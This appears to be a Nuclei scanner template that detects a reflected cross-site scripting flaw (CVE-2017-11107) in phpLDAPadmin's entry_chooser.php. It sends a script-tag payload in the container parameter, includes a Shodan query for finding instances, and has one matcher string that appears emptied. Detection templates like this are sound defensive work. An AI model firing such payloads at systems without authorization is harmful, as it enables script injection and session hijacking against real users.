id: CVE-2017-11107 info: name: phpLDAPadmin <= 1.2.3 - Reflected XSS author: 0x_Akoko severity: medium description: | phpLDAPadmin <= 1.2.3 contains a reflected cross-site scripting caused by unsanitized input in htdocs/entry_chooser.php via the form, element, rdn, or container parameter, letting attackers execute malicious scripts in victim browsers, exploit requires sending crafted input. impact: | Attackers can execute malicious scripts in victim browsers, potentially leading to session hijacking or defacement. remediation: | Update to the latest version of phpLDAPadmin where the vulnerability is fixed. reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-11107 - https://github.com/leenooks/phpLDAPadmin/issues/50 - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=867719 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-11107 epss-score: 0.00032 epss-percentile: 0.09693 cwe-id: CWE-79 cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: phpldapadmin_project product: phpldapadmin shodan-query: html:"phpLDAPadmin" tags: cve,cve2017,phpldapadmin,xss,unauth flow: http(1) && http(2) http: - method: GET path: - "{{BaseURL}}/phpldapadmin/" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "phpLDAPadmin")' condition: and internal: true - method: GET path: - "{{BaseURL}}/phpldapadmin/entry_chooser.php?container=%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "", "Entry Chooser")' condition: and # digest: 4a0a0047304502204879d8bf3174b5260da8cbd21157129c634f99163fef7ec651ee8cbca5a745ec02210089fbaad4d32a0503fdf1b46a2a306992faa442780aad3358871e5b6eaae0d79a:922c64590222798bb761d5b6d8e72950